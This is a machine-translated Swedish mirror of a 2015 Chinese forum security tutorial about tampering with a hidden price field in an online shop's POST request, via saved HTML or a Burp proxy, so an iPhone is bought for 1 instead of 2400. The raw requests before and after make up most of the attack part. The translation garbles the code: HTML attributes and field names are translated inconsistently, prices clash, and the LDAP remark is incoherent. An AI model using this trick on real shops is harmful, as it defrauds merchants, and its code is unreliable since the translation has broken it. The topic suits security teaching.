Denna artikel är en spegelartikel om maskinöversättning, klicka här för att hoppa till originalartikeln.

Architect_Programmer_Code Jordbruksnätverket»Arkitekt Andra teknologier Säker offensiv och försvar Intrusion Penetration: Tillämpning av HTTP-headers
Utsikt: 12836|Svar: 0

[Säkerhetshandledning] Intrusion Penetration: Tillämpning av HTTP-headers

[Kopiera länk]
Publicerad på 2015-02-07 17:59:07 | | |

Om tillämpningen av HTTP-headers

HTTP-header används ofta i överföringsmekanismen på webbplatser, men de flesta nybörjare i Kina har inte lagt märke till detta, denna artikel är endast tillägnad nybörjare, http-headerns roll i intrångsprocessen.

Ta shoppingsidan som exempel för att analysera en liten del av HTTP-headers roll.

Först, låt oss analysera ett formulär på shoppingsidan.

<formmetod="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<inputtyp="dold" namn="pris" värde="449">

<inputtyp="skicka in" värde="Köp">

</form>

Under öppningsprocessen, ta en skärmdump av hans http-meddelandeheader och titta

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kvantitet=1&price=2400

Även om prisfältet inte visas på sidan när man öppnar shoppingsidan, kan det ändå redigeras och användas av användaren.

Det finns två sätt att uppnå redigering

1. Spara HTML-källkoden för modifiering och ladda sedan om den i webbläsaren för att köra den

2. Använd proxy-avlyssning för att modifiera HTTP-headers (proxy-konstruktion i tool burp)

Ta HTTP-headern ovan som exempel
Före förändringen
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kvantitet=1&price=2400

Efter förändringen
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kvantitet=1&pris=1


I sista raden har fältet ett värde på 2400 och om vi ändrar det till 1 kan vi få iPhone 4S till ett billigare pris.

Den här artikeln ger endast en uppfattning om oväntade vinster som LDAP-injektion.




Föregående:MySQL Forgot lösenordsåterställningsmetod
Nästa:SQL-injektion för att erhålla hela webbplatsens sökväg

Relaterade inlägg
Friskrivning:
All programvara, programmeringsmaterial eller artiklar som publiceras av Code Farmer Network är endast för lärande- och forskningsändamål; Ovanstående innehåll får inte användas för kommersiella eller olagliga ändamål, annars kommer användarna att bära alla konsekvenser. Informationen på denna sida kommer från internet, och upphovsrättstvister har inget med denna sida att göra. Du måste helt radera ovanstående innehåll från din dator inom 24 timmar efter nedladdning. Om du gillar programmet, vänligen stöd äkta programvara, köp registrering och få bättre äkta tjänster. Om det finns något intrång, vänligen kontakta oss via e-post.
Mail To:help@itsvse.com